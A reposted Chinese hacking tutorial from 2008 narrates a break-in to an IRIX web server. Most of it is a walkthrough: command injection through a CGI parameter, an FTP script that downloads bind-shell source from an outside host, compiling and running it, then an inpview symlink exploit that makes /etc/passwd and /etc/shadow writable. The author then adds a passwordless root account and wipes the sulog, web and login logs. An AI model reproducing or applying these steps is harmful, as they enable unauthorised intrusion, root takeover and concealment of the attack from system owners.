当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 一次尝试IRIX的过程(nobody shell)

一次尝试IRIX的过程(nobody shell)

2008年10月08日 脚本攻防 我要评论
一次尝试IRIX的过程(nobody shell) 1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la 这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干... 08-10-08
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la
这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还
是要弄出一个shell有个$来得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面这些其实就是把这一段东西输进/tmp/a中: open www.xfocus.org <---------别当真,这里没有这个东西;)
user quack quack <---------我的用户名密码
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------这是一个绑定shell的东西,网上到处有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
这里呢,就是在运行ftp取回东西了;)这么拿文件的话在xferlog里不会有记录。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 编译 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 运行…… 3、现在我们可以telnet上去了 bash# telnet *.*.*.* 12345
trying *.*.*.*...
connected to *.*.*.*.
escape character is ’^]’.
sh -i;
$content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用irix的inpview漏洞,该漏洞的描述如下: 某些版本irix下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文
件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的
setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。 漏洞利用程序就不贴了,大家自己看看,很简单的,总之编译完成之后。 $content$nbsp;./a.out /etc/passwd; copyright last stage of delirium jan 2000 poland //lsd-pl.net/
/usr/lib/inperson/inpview for irix 6.5 6.5.8 ip:all looking for temporary file... found!
……
…… $content$nbsp;./a.out /etc/shadow;
……
…… 就把这两个破文件的权限都改成0666了,往下该干什么活不用我说了吧……
加个uid0的帐号,密码为空,修改系统,删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的
东西干掉,把passwd和shadow恢复回原样,再touch一下。走人,睡觉。 btw:一句题外话,现在irix的telnetd漏洞很猛呀,还好要有irix系统编译exploit,少了些小孩做坏
事,还有,那天stardust说还有许多irix的lp默认密码为空,我看了一下,的确如此,印象中mixter
写了一个小段子专门搜索网上lp空密码帐号的……
(0)

相关文章:

  • 友情检测网站

    友情检测网站

    友情检测某市公安局网站 大家好,我是上帝之爱,这几天闲着无聊,就想搞一下公安局的网站,就在网上找公安局的网站,嘿嘿,吃饱了没事干!目标站:用到的工具:1.左手... [阅读全文]
  • RPC漏洞入侵

    RPC漏洞入侵 RPC(Remote Procedure Call, 远程过程调用)是操作系统的一种消息传递功能,微软的描述为:“一种能允许分布式应用程序调用网络上不同计算机的可…

    2008年10月08日 网络安全
  • 安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例

    安全检测ASP.net开发网站实例 今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?... [阅读全文]
  • 入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法

    入侵RedHat Linux系统的方法 假设是:www.fbi.gov.tw。^__^ 先让俺看看是不是连得上: C:ping www.fbi.gov.tw ... [阅读全文]
  • 入侵某一游戏交易网

    入侵某一游戏交易网 在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程 一: 踩点 收集信息 因为这个…

    2008年10月08日 网络安全
  • 系统泄露密码的入侵分析

    系统泄露密码的入侵分析

    系统泄露密码的入侵分析 Windows访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。  下面是SMB的密... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com